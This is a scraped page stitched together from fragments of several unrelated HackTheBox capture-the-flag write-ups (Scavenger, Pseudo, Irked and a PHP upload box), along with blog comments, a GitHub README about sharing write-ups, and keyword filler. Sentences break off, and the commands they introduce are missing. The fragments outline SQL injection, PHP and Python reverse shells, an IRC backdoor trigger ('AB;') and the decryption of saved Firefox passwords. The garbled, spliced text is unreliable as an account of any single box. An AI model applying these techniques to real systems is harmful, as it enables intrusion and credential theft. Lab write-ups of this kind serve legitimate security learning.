Scavenger was a hard rated box which was very frustrating at times due to a crazy amount of rabbitholes. In the end though, I think it was a pretty realistic box that tested enumeration skills as well as methodology. A SQL injection vulnerability in whois uncovered some hidden domains. Enumeration of these domains turned up a php shell that required fuzzing to discover the correct parameter for use.
This allowed further enumeration of the box which found ftp credentials, allowing access to a. Analysis of the. Finally a bit of reverse engineering on a binary yielded a magic string which allowed code execution as root. I normally show interesting things found during enumeration but due to the large number of rabbitholes, I will only mention some things in passing.
I added scavenger. I checked ftp which did not allow anonymous access.
HackTheBox Writeup: Scavenger
A potential vulnerability in Exim but it was local only so I filed that away. Time to check out http:. Next I checked out www. I did some more dig ging around to no avail then switched to whois :. I got stuck here for a while until I took a step back and realized that running whois was user-supplied input. I threw a single quote at it and was somewhat surprised to see a SQL error.
In hindsight I shouldn't have been surprised if I had taken a closer look at the nmap scan:. Sweet, that worked but outputted a ton of data. Let's filter the results with grep to only show the domains:. There was also an entry that referenced a bug tracker being pwned:. I ran gobuster on these domains and sec I spent some time exploring the app here but couldn't really get anywhere.
There is a place to upload files but I couldn't find where they went. Eventually I got a nudge to further explore that shell. With some experimentation:.First we will face a SQLithen we will have to modify an C exploit to get shell. Once we have shell we will have to face a reversing and finally we will have to modify another C exploit. My nick in HackTheBox is: manulqwerty If you have any proposal or correction do not hesitate to leave a comment. After reviewing the results we see that we have a register and a login:.
To make the injection easier, we will use the BurpSuite Repeater:. As we see in the SQLi Cheat-Sheetthe first will be to guess the number of fields using order by :. We get these credentials :. With ftpuser: whereyougo? In the nmap: SSH To get shell, we will use the reverse shell of Python remember to escape the quotes :.
We look for files of the group Decoderwe found an. As we see in the pseudo-C that IDA PRO generates, we must pass -b as parameter and we must bypass the if of lines 31 and 35 to run with system s the second parameter.
To run the second argument that we passed we must include a line break, or it will concatenate the commands:. We know that the version is xenial 4. HacktheBoxWriteUps. Saturday August 3rd, at PM. Everything is very open with a precise clarification of the issues. It was truly informative. Your site is extremely helpful. Many thanks for sharing! This site uses Akismet to reduce spam.
Learn how your comment data is processed. Politica de privacidad y cookies. Search for:. HacktheBoxWriteUps basg hackthebox htb nightmare reversing. Leave a Reply Cancel reply Your email address will not be published. Comment Name Email Website.Post a Comment.
Search This Blog. Pseudo is the toughest challenge on HTB in my opinion as of well, before headachev2 released. Nothing even comes close to this reversing challenge, which centers around an aarch64 and VM crackme. Before I start, I would like to thank davidlightman for working on it with me.
He taught me many new reversing tricks and, oftentimes, managed to see things which I missed. Starting off, we identify that the binary is UPX packed, so unpack it first. Then, we realize that it is an aarch64 binary. To actually reverse this, I ended up using qemu user mode qemu-aarch Luckily, qemu-aarch64 had both a gdb remote debugging interface as well as a strace option to run when in emulation. For debugging, I used gdb-multiarch with the peda extension.
From an initial static analysis, we note that the main function is at 0xb0. Also, since it is statically compiled but completely stripped of symbols, it may help to identify some glibc functions.
How do we recognize what functions are glibc related? Well, I mainly analyzed strings and tried to map similarities to the real life source code. Moreover, once I found that 0x49eba8 was assertmy life became a lot easier.
Remember to actually rename the functions as you go along. Function is where the most important part is. There are multiple loops, random floating point arithmetic, and many conditionals. There also seems to be some bytecode starting from 0xb8. Let's get to some dynamic analysis. I highly recommend you use gdb's --command option to use its scripting capabilities. Upon running it, we get a message about "terminal for ants.
Now it prompts for a password! However, there is also a better way here: using qemu's strace, you will see a call to ioctl, which can be used in terminal screen size checks.Hackthebox Mango
As you can see in 0xe8, there is where the call is happening.If we test submitting a tip we get back a url with a secret name variable and what looks like a hash. Furthermore if we look at the site in Burp we can see an admin cookie being set to 0. Checking out the List option we are presented with a list of our uploads and also a Whiterose. Just based off this hint here we can assume there is an LFI vulnerability.
If we do a simple test on the op parameter we get a funny response. Here we can see that a directory with our IP address is getting created under uploads and uploading our tip there. Using the LFI on the source of index. We can also see the genFilename function located in common. This is where the hash value for the tip upload is coming from. For us to get code execution on the box we will have to leverage Burp as well as the PHP zip wrapper. First we will need to create a PHP reverse shell and then zip it.
In the area where the body of the tip normally goes, which in the above image is labeled shellzip we will use the option in Burp to Paste from a File and select our zipped shell. We can verify our upload by downloading our payload directly from the server and do an md5sum to ensure they are indeed the same file. Taking a look inside we find a crimestoppers. If we try nc localhost 80 and type get root it does indeed just error out with a error.
Going back to the. We can see that the passwords are encrypted. However we can decrypt them using the key3. In my case it was zpuhcptf. Make backups of your existing key3. Now you can launch Firefox and under Security settings you can view the saved passwords under Saved Logins.
Now that we are dom we can take a look at all the access. After looking through a few we finally find something. Toggle navigation absolomb's security blog. Enumeration Nmap scan to start things off. Nmap done: 1 IP address 1 host up scanned in Did we Time Travel?
Or is it? Xauthority -rw 1 dom dom 5 Dec 22 GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together. If nothing happens, download GitHub Desktop and try again. If nothing happens, download Xcode and try again. If nothing happens, download the GitHub extension for Visual Studio and try again. Machines writeups until March are protected with the corresponding root flag. But since this date, HTB flags are dynamic and different for every user, so is not possible for us to maintain this kind of system.
So from now we will accept only password protected challenges and retired machines that machine write-ups don't need password. It is totally forbidden to unprotect remove the password and distribute the pdf files of active machines, if we detect any misuse will be reported immediately to the HTB admins. Anyway, all the authors of the writeups of active machines in this repository are not responsible for the misuse that can be given to the corresponding documents. Please think that this is done to share techniques not for spoilers.
In this way, you will be added to our top contributors list see below and you will also receive an invitation link to an exclusive Telegram group where several hints not spoilers are discussed for the HacktheBox machines. Please consider protecting the text of your writeup e.
Of course, if someone leaks a writeup of an active machine it is not the responsibility of the author. If we detect someone who does it, they will immediately report to the HTB Staff so they can take the appropriate measures. Note: the minimum requirement to enter the "special" Telegram group is also to have a hacker level or higher no script kiddies.
Hack the Box is a superb platform to learn pentesting, there are many challenges and machines of different levels and with each one you manage to pass you learn a new thing. But talking among ourselves we realized that many times there are several ways to get rooting a machine, get a flag That's why we created this repository, as a site to share different unofficial writeups to see different techniques and acquire even more knowledge.
That is our goal and our passion, to share to learn together. Some people have been distrustful because in this repository there are writeups of active machines, even knowing that absolutely each one of them is protected with the corresponding password root flag or challenge. But We did not want to give up this because we think the most interesting thing for a HTB player is to check other users' walkthroughs right after they get it, that is, not wait for weeks or months afterwards.
For this reason, we have asked the HTB admins and they have given us a pleasant surprise: in the future, they are going to add the ability for users to submit writeups directly to HTB which can automatically be unlocked after owning a machine. And also, they merge in all of the writeups from this github page.
Simply great! Therefore it is a real pride that they have decided to include the functionality of this repo directly on their platform.You have an option to register for 30, 60, or 90 days of lab time.
Our goal is to add at least two new machines per month. Preferred keywords should have higher keywords density indicating their importance. The IP for the Box is This is exactly what we predicted earlier. Once you've gotten past the challenge, you can register and start navigating around the Hackthebox website. Measure technical skills by pentesting servers or analyzing forensic evidence rather than answering multiple choice questions.
Padding Oracle allows you to decrypt the encrypted code. Hello guys I'm sharing this config for hackthebox. How to get user and root. The ultimate and real Hacking-Lab. Text, markdown, HTML, and similar formats are preferred, but if you think that a video will be clearer, feel free to upload it!
Looks like the Register feature is not yet up. Then, you can upload your solution on the crackme page. I know this is a very old machine and got lot of walkthroughs — but I felt like most of them are hard to understand for beginners. I really liked this box for its awesome privilege escalation privesc and the rabbit holes.
Register; Username. Canape is hosting Simpsons fan site with some quotes from the characters of the show. It contains several challenges HackTheBox - Headache flag. What Hackthebox did for me by only trying to get an invite code was tremendous. Send it and you will see the Upload completed. Download files.
It contains several challenges that are constantly updated. You may submit your own quotes to be added to the list. After we register account with our name, we can see there is an auth cookie, because that is not the standard name for session cookies made with a framework, we can assume this could be vulnerable. As a result, I have decided to improve the explanations offered here. If you have any questions, please contact customer service.
The file is uploaded in upload directory. Feel free to join in on the discussion and post your feedback or tutorials here. It encouraged me to start learning Web Application Security. Get your ranks elevated, unlock HackTheBox Postman machine user and root flags are here.
Latest Crackmes. A place to share and advance your knowledge in penetration testing.
Category: Hack The Box Write-ups
Hack The Box. Bighead - Hack The Box. Next time I try to exploit something multiple ways, I'll probably split it up in multiple videos. We don't help you with that.Welcome to another HackTheBox write-up! I'm posting the full write-up here on my blog instead of on 0x00sec because my compatriot vict0ni posted a nice write-up this time around. I don't have any creds for ssh, so I decide to visit the webpage first to get an idea what's going on with this box. Before I do that, though, I kick off my secondary Nmap scan:.
I find that small. Still not much happening there, either. I downloaded the image to search for metadata, but didn't find anything. The source of the page, while sparse, did provide us with the potential clue "IRC server coming soon! I think it's time to consult searchsploit for possible exploits:. So there is a backdoor!
With that in mind, I prepare to fire up Metasploitbut before doing that I run searchsploit again to read the details of the exploit:. This is not a very complicated exploit. Once we connect to the IRC server, we send AB;which triggers the backdoor and allows us to execute code. We then execute our payload in Metasploit we'll pick a reverse shell of some kind and set the payload option variable to that shell, but if we were exploiting manually we would literally just replace everything after AB; with our own code.
We're connected, but our shell is terrible. I spent a lot of time trying to poke at the things I thought I needed, but the limitations of the shell made it extremely difficult. As usual, the angel that is guly clued me in on a very standard trick for getting a better shell instantly:. Now we have a much better way of working with our foothold, so I start enumerating in earnest. I am able to traverse into the directory, and I can see the user. However, I do not have permission to read it, so for now we'll leave it be.
There is a hidden file named. At last, my time has come. I know of only one thing that might hold something more than appeared at first glance; our irked. Once we've run the command, the file pass. If we cat this file, we see a string:.
This might be our password, so knowing the directory we found it in, let's turn to ssh to see if we can authenticate and get another shell:. I spent an eternity on this box after this point. I learned a lot about enumeration. I used a combination of this resource and the venerable though new to me at time of working on this box Linenum and pspy.
For LinenumI ran it and just piped the output to Linenum. The same goes for pspy though because pspy listens until terminated, I tend to run it for at least five minutes to ensure I capture any processes that recur on a scheduled basis.
On this box I ran pspy32s the smaller, bit version of pspy. Pictured below is the portion of output from Linenum that held the key to our root path, although I completely missed it because I am still a noob when it comes to Linux privesc. I ran file on viewuser and confirmed it is an ELF. I read the contents of the file you can do this with, in my preferred order, stringsxxdlessor cat and noted this interesting bit:.